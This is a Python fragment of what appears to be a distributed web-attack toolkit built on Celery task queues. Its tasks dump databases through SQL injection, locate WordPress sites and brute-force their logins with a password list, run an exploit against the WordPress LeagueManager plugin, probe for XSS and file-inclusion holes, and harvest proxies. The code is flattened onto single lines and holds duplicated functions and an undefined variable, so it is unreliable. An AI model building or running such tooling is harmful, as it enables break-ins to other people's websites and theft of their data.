def scrape_links(link, browser_args, job_name, out_name, depth, include_external, match, past=None): if not past: past = BloomFilter(capacity=3 * 10**(depth + 3), error_rate=0.001) out = base_link_scraper(link, browser_args, past, include_external) if not out: return if depth: args = (browser_args, job_name, out_name, depth - 1, include_external, match) kwargs = {'past': past} group( scrape_links.subtask((url, ) + args, kwargs, ** scrape_links.request.delivery_info) for url in out)() if match: out = [url for url in out if any(x in url for x in match)] if out: celery_output.delay(out, name, job_name, out_name)
def sqli_dump(num, browser_args, job_name, out_name, url, ident, left, right, attempts): out = base_sqli_dump(num, browser_args, url, ident, left, right, attempts) if type(out) == str: celery_output.delay(out, name, job_name, out_name) return if attempts - 1: base_sqli_dump.delay(num, browser_args, job_name, out_name, url, ident, left, right, attempts - 1)
def scan_wp(url, browser_args, job_name, out_name, first=True): out = base_scan_wp(url, browser_args) if out: celery_output.delay(out, name, job_name, out_name) elif first: args = (browser_args, job_name, out_name) kwargs = {'first' : False} group(scan_wp.subtask( (link,) + args, kwargs, **scan_wp.request.delivery_info) for link in base_find_wp(url))()
def check_keyword(link, browser_args, job_name, out_name, keywords, check_url=False): out = base_check_keyword(link, browser_args, keywords, check_url) if out: celery_output.delay(out, name, job_name, out_name)
def scan_wp(url, browser_args, job_name, out_name, first=True): out = base_scan_wp(url, browser_args) if out: celery_output.delay(out, name, job_name, out_name) elif first: args = (browser_args, job_name, out_name) kwargs = {'first': False} group( scan_wp.subtask((link, ) + args, kwargs, **scan_wp.request.delivery_info) for link in base_find_wp(url))()
def wp_init(url, browser_args, job_name, out_name): params = base_wp_init(url, browser_args) b = Browser(name, **browser_args) r = b.go(url, data=params) if WP_GDKEY in r.text: celery_output.delay(out_format(out, params), name, job_name, out_name) elif WP_BUSER in r.text: wp_user.delay(url, browser_args, job_name, out_name, params) else: wp_brute.delay(url, browser_args, job_name, out_name, params, 1)
def wp_brute(url, browser_args, job_name, out_name, params, pnum=0): if pnum: params['pwd'] = wp_brute.plist[pnum-1] out = base_wp_brute(url, browser_args, params) if out: return celery_output.delay(out_format(out, params), name, job_name, out_name) if pnum <= wp_brute.plen: wp_brute.delay(url, browser_args, job_name, out_name, params, pnum+1)
def wp_brute(url, browser_args, job_name, out_name, params, pnum=0): if pnum: params['pwd'] = wp_brute.plist[pnum - 1] out = base_wp_brute(url, browser_args, params) if out: return celery_output.delay(out_format(out, params), name, job_name, out_name) if pnum <= wp_brute.plen: wp_brute.delay(url, browser_args, job_name, out_name, params, pnum + 1)
def scan_dom(url, browser_args, job_name, out_name): matches = base_scan_dom(url, browser_args) if matches: output = url + ' ||| {}' celery_output.delay(output.format(matches), name, job_name, out_name)
def scan_sqli(url, browser_args, job_name, out_name): out = base_sqli_scan(url, browser_args) if out: celery_output.delay(out, name, job_name, out_name)
def exploit_wp_leaguemanager(url, browser_args, job_name, out_name): out = base_wp_leaguemanager(url, browser_args) if out: celery_output.delay(out, name, job_name, out_name)
def scrape_headers(link, browser_args, job_name, out_name, match): out = base_scrape_headers(link, browser_args, match) if out: celery_output.delay(dumps([link, out], indent=4), name, job_name, out_name)
def check_proxy(proxy, browser_args, job_name, out_name, target_site, target_key): out = base_check_proxy(proxy, browser_args, target_site, target_key) if out: celery_output.delay(out, name, job_name, out_name)
def test_rlfi(link, browser_args, job_name, out_name, key): out = base_check_keyword(link, browser_args, [key, 'No such file']) if out: celery_output.delay(out, name, job_name, out_name)
def scrape_proxy(link, browser_args, job_name, out_name): out = base_scrape_proxy(link, browser_args) if out: celery_output.delay(out, name, job_name, out_name)
def test_xss(url, browser_args, job_name, out_name): out = base_check_keyword(url, browser_args, ['<SSX>']) if out: output = url + ' ||| {}' celery_output.delay(output.format(out), name, job_name, out_name)